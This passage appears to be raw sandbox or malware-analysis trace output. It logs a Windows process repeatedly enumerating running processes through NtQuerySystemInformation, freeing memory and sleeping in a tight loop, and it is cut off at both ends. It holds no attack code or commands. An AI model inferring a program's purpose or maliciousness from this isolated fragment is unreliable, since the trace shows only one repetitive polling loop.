BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.736] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.755] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.774] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.811] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.830] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.837] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.854] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.862] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.878] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.887] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.896] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.905] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.915] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 